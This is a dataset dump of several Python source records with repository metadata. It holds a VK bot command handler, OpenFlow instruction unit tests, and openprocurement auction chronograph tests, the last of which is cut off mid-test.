8ce755f7b195f8eb960dcb1f1b63de122ae3bd6f
|
[
"Apache-2.0"
] | null | null | null |
commands.py
|
MaskedTrench/bot
|
8ce755f7b195f8eb960dcb1f1b63de122ae3bd6f
|
[
"Apache-2.0"
] | null | null | null |
class vk:
    """Slash-command dispatch for VK chat events.

    Both handlers take an event object exposing a ``.text`` attribute and
    return the canned reply for the leading slash-command token, or the
    literal string "None" when the command is unknown.
    """

    # Shared command table — the two handlers previously duplicated the same
    # if/elif chain; keeping the mapping in one place removes that drift risk.
    _RESPONSES = {
        '/команды': "Text goes here",
        '/регистрация': "Link to forms",
        '/статьи': "FOR HOUNOR AND BLOOD!",
    }

    def PersonalCommands(event):
        """Handle a command from a personal (direct) message."""
        text = event.text.split(" ")
        print(text, event.text)
        return vk._RESPONSES.get(text[0], "None")

    def PublicCommands(event):
        """Handle a command from a public (group) chat message."""
        text = event.text.split(" ")
        print(text, event.text)
        return vk._RESPONSES.get(text[0], "None")
| 39.235294
| 70
| 0.550225
| 80
| 667
| 4.5875
| 0.3375
| 0.147139
| 0.179837
| 0.098093
| 0.882834
| 0.882834
| 0.882834
| 0.882834
| 0.882834
| 0.882834
| 0
| 0.012931
| 0.304348
| 667
| 17
| 71
| 39.235294
| 0.778017
| 0
| 0
| 0.8
| 0
| 0
| 0.23988
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.133333
| false
| 0
| 0
| 0
| 0.2
| 0.133333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
904d793d2ecc800237716d2d931d8b2150a1c56f
| 1,842
|
py
|
Python
|
tests/v0x02/test_common/test_flow_instruction.py
|
smythtech/python-openflow-legacy
|
f4ddb06ac8c98f074c04f027df4b52542e41c123
|
[
"MIT"
] | null | null | null |
tests/v0x02/test_common/test_flow_instruction.py
|
smythtech/python-openflow-legacy
|
f4ddb06ac8c98f074c04f027df4b52542e41c123
|
[
"MIT"
] | null | null | null |
tests/v0x02/test_common/test_flow_instruction.py
|
smythtech/python-openflow-legacy
|
f4ddb06ac8c98f074c04f027df4b52542e41c123
|
[
"MIT"
] | null | null | null |
import unittest
from pyof.v0x02.common import flow_instruction
class TestOFPInstructionGoToTable(unittest.TestCase):
    """Size and pack checks for the OFPT Goto-Table instruction."""

    @staticmethod
    def _build():
        """Return the fixed instruction under test (len=8, table_id=1)."""
        return flow_instruction.OFPInstructionGoToTable(
            type=flow_instruction.OFPInstructionsType.OFPIT_GOTO_TABLE,
            len=8, table_id=1, pad=[0, 0, 0])

    def test_get_size(self):
        """The declared wire size of the instruction is 8 bytes."""
        self.assertEqual(self._build().get_size(), 8)

    def test_pack(self):
        """Packing the instruction must complete without raising."""
        self._build().pack()

    def test_unpack(self):
        """Unpack is not covered yet."""
        pass
class TestOFPInstructionWriteMetadata(unittest.TestCase):
    """Size and pack checks for the Write-Metadata instruction."""

    @staticmethod
    def _build():
        """Return the fixed instruction under test (len=24)."""
        return flow_instruction.OFPInstructionWriteMetadata(
            type=flow_instruction.OFPInstructionsType.OFPIT_WRITE_METADATA,
            len=24, pad=[0, 0, 0, 0], metadata=1, metadata_mask=1)

    def test_get_size(self):
        """The declared wire size of the instruction is 24 bytes."""
        self.assertEqual(self._build().get_size(), 24)

    def test_pack(self):
        """Packing the instruction must complete without raising."""
        self._build().pack()

    def test_unpack(self):
        """Unpack is not covered yet."""
        pass
class TestOFPInstructionActions(unittest.TestCase):
    """Size and pack checks for the Write-Actions instruction."""

    @staticmethod
    def _build():
        """Return the fixed instruction under test (len=8, no actions)."""
        return flow_instruction.OFPInstructionActions(
            type=flow_instruction.OFPInstructionsType.OFPIT_WRITE_ACTIONS,
            len=8)

    def test_get_size(self):
        """The declared wire size of the instruction is 8 bytes."""
        self.assertEqual(self._build().get_size(), 8)

    def test_pack(self):
        """Packing the instruction must complete without raising."""
        self._build().pack()

    def test_unpack(self):
        """Unpack is not covered yet."""
        pass
| 33.490909
| 79
| 0.674267
| 199
| 1,842
| 6.020101
| 0.211055
| 0.162771
| 0.075125
| 0.130217
| 0.8798
| 0.855593
| 0.855593
| 0.8197
| 0.75793
| 0.75793
| 0
| 0.024911
| 0.237242
| 1,842
| 54
| 80
| 34.111111
| 0.827758
| 0
| 0
| 0.853659
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073171
| 1
| 0.219512
| false
| 0.073171
| 0.04878
| 0
| 0.341463
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
907ce10da11ce27e1fd621928884ac38e78b6a40
| 140
|
py
|
Python
|
tests/test_utils/test_testing.py
|
bigdata-ustc/CangJie
|
a3264082fa0432d257b5c4722b14c55f9092a411
|
[
"MIT"
] | 2
|
2020-03-04T02:27:29.000Z
|
2020-05-22T04:07:24.000Z
|
tests/test_utils/test_testing.py
|
tswsxk/CangJie
|
50c5183eae1d4f10c4cf364262437afcf54427fa
|
[
"MIT"
] | null | null | null |
tests/test_utils/test_testing.py
|
tswsxk/CangJie
|
50c5183eae1d4f10c4cf364262437afcf54427fa
|
[
"MIT"
] | 1
|
2020-01-07T08:34:59.000Z
|
2020-01-07T08:34:59.000Z
|
# coding: utf-8
# 2020/1/3 @ tongshiwei
from CangJie.utils.testing import pseudo_sentence
def test_testing():
    # Smoke test: just exercise pseudo_sentence with small arguments.
    # NOTE(review): the meaning of (5, 20) is assumed from the call site only —
    # confirm against CangJie.utils.testing.pseudo_sentence's signature.
    pseudo_sentence(5, 20)
| 15.555556
| 49
| 0.735714
| 21
| 140
| 4.761905
| 0.857143
| 0.28
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084746
| 0.157143
| 140
| 8
| 50
| 17.5
| 0.762712
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
90c98a3cd381e8c2019c749759c845e2980ff93a
| 49,208
|
py
|
Python
|
openprocurement/auctions/insider/tests/chronograph.py
|
kukirokuk/dutchsales
|
41f6fca69c8ecd9dd4c4bba567635b418d371203
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/auctions/insider/tests/chronograph.py
|
kukirokuk/dutchsales
|
41f6fca69c8ecd9dd4c4bba567635b418d371203
|
[
"Apache-2.0"
] | null | null | null |
openprocurement/auctions/insider/tests/chronograph.py
|
kukirokuk/dutchsales
|
41f6fca69c8ecd9dd4c4bba567635b418d371203
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import unittest
from datetime import datetime, timedelta
from openprocurement.api.models import get_now
from openprocurement.auctions.insider.tests.base import BaseAuctionWebTest, test_lots, test_bids, test_financial_auction_data, test_financial_organization, test_financial_bids, test_organization
class AuctionSwitchQualificationResourceTest(BaseAuctionWebTest):
    """Chronograph tick on an auction that has a single bid."""

    initial_bids = test_bids[:1]

    def test_switch_to_qualification(self):
        """With one bid the chronograph flips the auction to 'unsuccessful'
        and produces no awards."""
        self.set_status('active.auction', {'status': self.initial_status})
        self.app.authorization = ('Basic', ('chronograph', ''))
        resp = self.app.patch_json('/auctions/{}'.format(self.auction_id),
                                   {'data': {'id': self.auction_id}})
        self.assertEqual(resp.status, '200 OK')
        self.assertEqual(resp.content_type, 'application/json')
        self.assertEqual(resp.json['data']["status"], "unsuccessful")
        self.assertNotIn("awards", resp.json['data'])
class AuctionSwitchAuctionResourceTest(BaseAuctionWebTest):
    """Chronograph tick on an auction with a full set of bids."""

    initial_bids = test_bids

    def test_switch_to_auction(self):
        """With enough bids the chronograph moves the auction into the
        'active.auction' state."""
        self.set_status('active.auction', {'status': self.initial_status})
        self.app.authorization = ('Basic', ('chronograph', ''))
        resp = self.app.patch_json('/auctions/{}'.format(self.auction_id),
                                   {'data': {'id': self.auction_id}})
        self.assertEqual(resp.status, '200 OK')
        self.assertEqual(resp.content_type, 'application/json')
        self.assertEqual(resp.json['data']["status"], "active.auction")
class AuctionSwitchUnsuccessfulResourceTest(BaseAuctionWebTest):
    """Chronograph tick on an auction with no bids configured."""

    def test_switch_to_unsuccessful(self):
        """The chronograph flips the auction — and every lot, when lots are
        present — to 'unsuccessful'."""
        self.set_status('active.auction', {'status': self.initial_status})
        self.app.authorization = ('Basic', ('chronograph', ''))
        resp = self.app.patch_json('/auctions/{}'.format(self.auction_id),
                                   {'data': {'id': self.auction_id}})
        self.assertEqual(resp.status, '200 OK')
        self.assertEqual(resp.content_type, 'application/json')
        self.assertEqual(resp.json['data']["status"], "unsuccessful")
        if self.initial_lots:
            lot_statuses = {lot['status'] for lot in resp.json['data']["lots"]}
            self.assertEqual(lot_statuses, {"unsuccessful"})
# Lot-aware variant of the qualification-switch test; lots are currently
# disabled for this procedure, so the whole class is skipped.
@unittest.skip("option not available")
class AuctionLotSwitchQualificationResourceTest(AuctionSwitchQualificationResourceTest):
    initial_lots = test_lots
# Lot-aware variant of the auction-switch test; lots are currently disabled
# for this procedure, so the whole class is skipped.
@unittest.skip("option not available")
class AuctionLotSwitchAuctionResourceTest(AuctionSwitchAuctionResourceTest):
    initial_lots = test_lots
# Lot-aware variant of the unsuccessful-switch test; lots are currently
# disabled for this procedure, so the whole class is skipped.
@unittest.skip("option not available")
class AuctionLotSwitchUnsuccessfulResourceTest(AuctionSwitchUnsuccessfulResourceTest):
    initial_lots = test_lots
class AuctionAuctionPeriodResourceTest(BaseAuctionWebTest):
    """Chronograph handling of auctionPeriod: setting, overriding and
    resetting the startDate / shouldStartAfter fields."""

    initial_bids = test_bids

    def test_set_auction_period(self):
        """A chronograph tick populates auctionPeriod.shouldStartAfter, and a
        broker-set startDate can be assigned and then cleared with None."""
        self.app.authorization = ('Basic', ('chronograph', ''))
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
        self.assertEqual(response.json['data']["status"], 'active.tendering')
        # With lots the period lives on the first lot, otherwise on the auction.
        if self.initial_lots:
            item = response.json['data']["lots"][0]
        else:
            item = response.json['data']
        self.assertIn('auctionPeriod', item)
        self.assertIn('shouldStartAfter', item['auctionPeriod'])
        # shouldStartAfter may not precede the end of the tendering period.
        self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
        self.assertIn('T00:00:00+', item['auctionPeriod']['shouldStartAfter'])
        self.assertEqual(response.json['data']['next_check'], response.json['data']['tenderPeriod']['endDate'])
        # Set an explicit far-future startDate and verify it is stored as-is.
        if self.initial_lots:
            response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00+00:00"}}]}})
            item = response.json['data']["lots"][0]
        else:
            response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00+00:00"}}})
            item = response.json['data']
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(item['auctionPeriod']['startDate'], '9999-01-01T00:00:00+00:00')
        # Patching startDate to None clears it again.
        if self.initial_lots:
            response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"lots": [{"auctionPeriod": {"startDate": None}}]}})
            item = response.json['data']["lots"][0]
        else:
            response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"auctionPeriod": {"startDate": None}}})
            item = response.json['data']
        self.assertEqual(response.status, '200 OK')
        self.assertNotIn('startDate', item['auctionPeriod'])

    def test_reset_auction_period(self):
        """Walk the auction through several startDate rewrites (far future,
        'now', tenderPeriod end) and check how shouldStartAfter and
        next_check are recomputed on every chronograph tick."""
        self.app.authorization = ('Basic', ('chronograph', ''))
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
        self.assertEqual(response.json['data']["status"], 'active.tendering')
        if self.initial_lots:
            item = response.json['data']["lots"][0]
        else:
            item = response.json['data']
        self.assertIn('auctionPeriod', item)
        self.assertIn('shouldStartAfter', item['auctionPeriod'])
        self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
        self.assertEqual(response.json['data']['next_check'], response.json['data']['tenderPeriod']['endDate'])
        # 1) Far-future startDate while still tendering.
        if self.initial_lots:
            response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}]}})
            item = response.json['data']["lots"][0]
        else:
            response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}})
            item = response.json['data']
        self.assertEqual(response.status, '200 OK')
        self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
        self.assertIn('9999-01-01T00:00:00', item['auctionPeriod']['startDate'])
        # 2) Move to active.auction and tick the chronograph.
        self.set_status('active.auction', {'status': 'active.tendering'})
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.json['data']["status"], 'active.auction')
        item = response.json['data']["lots"][0] if self.initial_lots else response.json['data']
        self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
        # 3) Far-future startDate while in active.auction: next_check follows it.
        if self.initial_lots:
            response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}]}})
            item = response.json['data']["lots"][0]
        else:
            response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}})
            item = response.json['data']
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.json['data']["status"], 'active.auction')
        self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
        self.assertIn('9999-01-01T00:00:00', item['auctionPeriod']['startDate'])
        self.assertIn('9999-01-01T00:00:00', response.json['data']['next_check'])
        # 4) Rewrite startDate to "now" directly in the DB; next_check must
        # move past it after a tick and match what is persisted.
        now = get_now().isoformat()
        auction = self.db.get(self.auction_id)
        if self.initial_lots:
            auction['lots'][0]['auctionPeriod']['startDate'] = now
        else:
            auction['auctionPeriod']['startDate'] = now
        self.db.save(auction)
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.json['data']["status"], 'active.auction')
        item = response.json['data']["lots"][0] if self.initial_lots else response.json['data']
        self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
        self.assertGreater(response.json['data']['next_check'], item['auctionPeriod']['startDate'])
        self.assertEqual(response.json['data']['next_check'], self.db.get(self.auction_id)['next_check'])
        # 5) startDate equal to tenderPeriod.endDate replaces the 9999 value.
        if self.initial_lots:
            response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"lots": [{"auctionPeriod": {"startDate": response.json['data']['tenderPeriod']['endDate']}}]}})
            item = response.json['data']["lots"][0]
        else:
            response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"auctionPeriod": {"startDate": response.json['data']['tenderPeriod']['endDate']}}})
            item = response.json['data']
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.json['data']["status"], 'active.auction')
        self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
        self.assertNotIn('9999-01-01T00:00:00', item['auctionPeriod']['startDate'])
        self.assertGreater(response.json['data']['next_check'], response.json['data']['tenderPeriod']['endDate'])
        auction = self.db.get(self.auction_id)
        self.assertGreater(auction['next_check'], response.json['data']['tenderPeriod']['endDate'])
        # 6) Collapse tenderPeriod (endDate == startDate) in the DB; the
        # chronograph should then drop next_check entirely.
        auction['tenderPeriod']['endDate'] = auction['tenderPeriod']['startDate']
        if self.initial_lots:
            auction['lots'][0]['auctionPeriod']['startDate'] = auction['tenderPeriod']['startDate']
        else:
            auction['auctionPeriod']['startDate'] = auction['tenderPeriod']['startDate']
        self.db.save(auction)
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
        if self.initial_lots:
            item = response.json['data']["lots"][0]
        else:
            item = response.json['data']
        self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
        self.assertNotIn('next_check', response.json['data'])
        self.assertNotIn('next_check', self.db.get(self.auction_id))
        # 7) A second tick must leave shouldStartAfter stable and still no next_check.
        shouldStartAfter = item['auctionPeriod']['shouldStartAfter']
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
        if self.initial_lots:
            item = response.json['data']["lots"][0]
        else:
            item = response.json['data']
        self.assertEqual(item['auctionPeriod']['shouldStartAfter'], shouldStartAfter)
        self.assertNotIn('next_check', response.json['data'])
        # 8) Setting a far-future startDate again restores next_check.
        if self.initial_lots:
            response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"lots": [{"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}]}})
            item = response.json['data']["lots"][0]
        else:
            response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {"auctionPeriod": {"startDate": "9999-01-01T00:00:00"}}})
            item = response.json['data']
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.json['data']["status"], 'active.auction')
        self.assertGreaterEqual(item['auctionPeriod']['shouldStartAfter'], response.json['data']['tenderPeriod']['endDate'])
        self.assertIn('9999-01-01T00:00:00', item['auctionPeriod']['startDate'])
        self.assertIn('9999-01-01T00:00:00', response.json['data']['next_check'])
class AuctionAwardSwitchResourceTest(BaseAuctionWebTest):
    """Chronograph expiry of award periods (verification / payment /
    signing) when a second award exists to fall back to: the first award
    becomes 'unsuccessful' and the next goes to 'pending.verification'."""

    initial_status = 'active.auction'
    initial_bids = test_bids

    def setUp(self):
        """Post auction results so two awards exist, then remember both
        award ids for the tests."""
        super(AuctionAwardSwitchResourceTest, self).setUp()
        authorization = self.app.authorization
        self.app.authorization = ('Basic', ('auction', ''))
        now = get_now()
        # Bids get descending dates (now - i seconds) so ordering is fixed.
        auction_result = {
            'bids': [
                {
                    "id": b['id'],
                    "date": (now - timedelta(seconds=i)).isoformat(),
                    "value": b['value']
                }
                for i, b in enumerate(self.initial_bids)
            ]
        }
        response = self.app.post_json('/auctions/{}/auction'.format(self.auction_id), {'data': auction_result})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
        auction = response.json['data']
        self.assertEqual('active.qualification', auction["status"])
        self.award = self.first_award = auction['awards'][0]
        self.second_award = auction['awards'][1]
        self.award_id = self.first_award_id = self.first_award['id']
        self.second_award_id = self.second_award['id']
        self.app.authorization = authorization

    def test_switch_verification_to_unsuccessful(self):
        """Expire the first award's verificationPeriod in the DB; a tick
        fails it and promotes the second award."""
        auction = self.db.get(self.auction_id)
        auction['awards'][0]['verificationPeriod']['endDate'] = auction['awards'][0]['verificationPeriod']['startDate']
        self.db.save(auction)
        self.app.authorization = ('Basic', ('chronograph', ''))
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
        self.assertEqual(response.status, '200 OK')
        auction = response.json['data']
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
        self.assertEqual(auction['awards'][1]['status'], 'pending.verification')
        self.assertEqual(auction['status'], 'active.qualification')
        self.assertNotIn('endDate', auction['awardPeriod'])

    def test_switch_payment_to_unsuccessful(self):
        """Move the first award to pending.payment (protocol upload + patch),
        expire its paymentPeriod, and check the chronograph fails it."""
        bid_token = self.initial_bids_tokens[self.award['bid_id']]
        # Upload and label the auction protocol — precondition for the
        # pending.payment transition.
        response = self.app.post('/auctions/{}/awards/{}/documents?acc_token={}'.format(
            self.auction_id, self.award_id, self.auction_token), upload_files=[('file', 'auction_protocol.pdf', 'content')])
        self.assertEqual(response.status, '201 Created')
        self.assertEqual(response.content_type, 'application/json')
        doc_id = response.json["data"]['id']
        key = response.json["data"]["url"].split('?')[-1]
        response = self.app.patch_json('/auctions/{}/awards/{}/documents/{}?acc_token={}'.format(self.auction_id, self.award_id, doc_id, self.auction_token), {"data": {
            "description": "auction protocol",
            "documentType": 'auctionProtocol'
        }})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
        self.assertEqual(response.json["data"]["documentType"], 'auctionProtocol')
        response = self.app.patch_json('/auctions/{}/awards/{}'.format(self.auction_id, self.award_id), {"data": {"status": "pending.payment"}})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
        self.assertEqual(response.json['data']["status"], "pending.payment")
        # Expire the payment period directly in the DB, then tick.
        auction = self.db.get(self.auction_id)
        auction['awards'][0]['paymentPeriod']['endDate'] = auction['awards'][0]['paymentPeriod']['startDate']
        self.db.save(auction)
        self.app.authorization = ('Basic', ('chronograph', ''))
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
        self.assertEqual(response.status, '200 OK')
        auction = response.json['data']
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
        self.assertEqual(auction['awards'][1]['status'], 'pending.verification')
        self.assertEqual(auction['status'], 'active.qualification')
        self.assertNotIn('endDate', auction['awardPeriod'])

    def test_switch_active_to_unsuccessful(self):
        """Activate the first award, expire its signingPeriod, and check the
        chronograph fails it and cancels its contract."""
        bid_token = self.initial_bids_tokens[self.award['bid_id']]
        response = self.app.post('/auctions/{}/awards/{}/documents?acc_token={}'.format(
            self.auction_id, self.award_id, self.auction_token), upload_files=[('file', 'auction_protocol.pdf', 'content')])
        self.assertEqual(response.status, '201 Created')
        self.assertEqual(response.content_type, 'application/json')
        doc_id = response.json["data"]['id']
        key = response.json["data"]["url"].split('?')[-1]
        response = self.app.patch_json('/auctions/{}/awards/{}/documents/{}?acc_token={}'.format(self.auction_id, self.award_id, doc_id, self.auction_token), {"data": {
            "description": "auction protocol",
            "documentType": 'auctionProtocol'
        }})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
        self.assertEqual(response.json["data"]["documentType"], 'auctionProtocol')
        response = self.app.patch_json('/auctions/{}/awards/{}'.format(self.auction_id, self.award_id), {"data": {"status": "pending.payment"}})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
        self.assertEqual(response.json['data']["status"], "pending.payment")
        response = self.app.patch_json('/auctions/{}/awards/{}'.format(self.auction_id, self.award_id), {"data": {"status": "active"}})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
        self.assertEqual(response.json['data']["status"], "active")
        # Expire the signing period directly in the DB, then tick.
        auction = self.db.get(self.auction_id)
        auction['awards'][0]['signingPeriod']['endDate'] = auction['awards'][0]['signingPeriod']['startDate']
        self.db.save(auction)
        self.app.authorization = ('Basic', ('chronograph', ''))
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
        auction = response.json['data']
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
        self.assertEqual(auction['contracts'][0]['status'], 'cancelled')
        self.assertEqual(auction['awards'][1]['status'], 'pending.verification')
        self.assertEqual(auction['status'], 'active.qualification')
        self.assertNotIn('endDate', auction['awardPeriod'])
class AuctionAwardSwitch2ResourceTest(BaseAuctionWebTest):
    """Same award-period expiry scenarios as AuctionAwardSwitchResourceTest,
    but with inline 'qualified' bids: here BOTH awards end 'unsuccessful'
    and the whole auction becomes 'unsuccessful'."""

    initial_status = 'active.auction'
    # Two qualified bids with distinct amounts (101, 202) built inline.
    initial_bids = [
        {
            "tenderers": [
                test_organization
            ],
            "value": {
                "amount": 101 * (i + 1),
                "currency": "UAH",
                "valueAddedTaxIncluded": True
            },
            'qualified': True
        }
        for i in range(2)
    ]

    def setUp(self):
        """Post the bids as auction results and remember both award ids."""
        super(AuctionAwardSwitch2ResourceTest, self).setUp()
        authorization = self.app.authorization
        self.app.authorization = ('Basic', ('auction', ''))
        response = self.app.post_json('/auctions/{}/auction'.format(self.auction_id), {'data': {'bids': self.initial_bids}})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
        auction = response.json['data']
        self.assertEqual('active.qualification', auction["status"])
        self.award = self.first_award = auction['awards'][0]
        self.second_award = auction['awards'][1]
        self.award_id = self.first_award_id = self.first_award['id']
        self.second_award_id = self.second_award['id']
        self.app.authorization = authorization

    def test_switch_verification_to_unsuccessful(self):
        """Expire the first award's verificationPeriod; both awards and the
        auction end 'unsuccessful' and awardPeriod is closed."""
        auction = self.db.get(self.auction_id)
        auction['awards'][0]['verificationPeriod']['endDate'] = auction['awards'][0]['verificationPeriod']['startDate']
        self.db.save(auction)
        self.app.authorization = ('Basic', ('chronograph', ''))
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
        self.assertEqual(response.status, '200 OK')
        auction = response.json['data']
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
        self.assertEqual(auction['awards'][1]['status'], 'unsuccessful')
        self.assertEqual(auction['status'], 'unsuccessful')
        self.assertIn('endDate', auction['awardPeriod'])

    def test_switch_payment_to_unsuccessful(self):
        """Move the first award to pending.payment, expire its paymentPeriod;
        both awards and the auction end 'unsuccessful'."""
        bid_token = self.initial_bids_tokens[self.award['bid_id']]
        # Upload and label the auction protocol — precondition for the
        # pending.payment transition.
        response = self.app.post('/auctions/{}/awards/{}/documents?acc_token={}'.format(
            self.auction_id, self.award_id, self.auction_token), upload_files=[('file', 'auction_protocol.pdf', 'content')])
        self.assertEqual(response.status, '201 Created')
        self.assertEqual(response.content_type, 'application/json')
        doc_id = response.json["data"]['id']
        key = response.json["data"]["url"].split('?')[-1]
        response = self.app.patch_json('/auctions/{}/awards/{}/documents/{}?acc_token={}'.format(self.auction_id, self.award_id, doc_id, self.auction_token), {"data": {
            "description": "auction protocol",
            "documentType": 'auctionProtocol'
        }})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
        self.assertEqual(response.json["data"]["documentType"], 'auctionProtocol')
        response = self.app.patch_json('/auctions/{}/awards/{}'.format(self.auction_id, self.award_id), {"data": {"status": "pending.payment"}})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
        self.assertEqual(response.json['data']["status"], "pending.payment")
        # Expire the payment period directly in the DB, then tick.
        auction = self.db.get(self.auction_id)
        auction['awards'][0]['paymentPeriod']['endDate'] = auction['awards'][0]['paymentPeriod']['startDate']
        self.db.save(auction)
        self.app.authorization = ('Basic', ('chronograph', ''))
        response = self.app.patch_json('/auctions/{}'.format(self.auction_id), {'data': {'id': self.auction_id}})
        self.assertEqual(response.status, '200 OK')
        auction = response.json['data']
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(auction['awards'][0]['status'], 'unsuccessful')
        self.assertEqual(auction['awards'][1]['status'], 'unsuccessful')
        self.assertEqual(auction['status'], 'unsuccessful')
        self.assertIn('endDate', auction['awardPeriod'])

    def test_switch_active_to_unsuccessful(self):
        """Activate the first award, expire its signingPeriod; its contract is
        cancelled and the auction ends 'unsuccessful'."""
        bid_token = self.initial_bids_tokens[self.award['bid_id']]
        response = self.app.post('/auctions/{}/awards/{}/documents?acc_token={}'.format(
            self.auction_id, self.award_id, self.auction_token), upload_files=[('file', 'auction_protocol.pdf', 'content')])
        self.assertEqual(response.status, '201 Created')
        self.assertEqual(response.content_type, 'application/json')
        doc_id = response.json["data"]['id']
        key = response.json["data"]["url"].split('?')[-1]
        response = self.app.patch_json('/auctions/{}/awards/{}/documents/{}?acc_token={}'.format(self.auction_id, self.award_id, doc_id, self.auction_token), {"data": {
            "description": "auction protocol",
            "documentType": 'auctionProtocol'
        }})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
        self.assertEqual(response.json["data"]["documentType"], 'auctionProtocol')
        response = self.app.patch_json('/auctions/{}/awards/{}'.format(self.auction_id, self.award_id), {"data": {"status": "pending.payment"}})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
        self.assertEqual(response.json['data']["status"], "pending.payment")
        response = self.app.patch_json('/auctions/{}/awards/{}'.format(self.auction_id, self.award_id), {"data": {"status": "active"}})
        self.assertEqual(response.status, '200 OK')
        self.assertEqual(response.content_type, 'application/json')
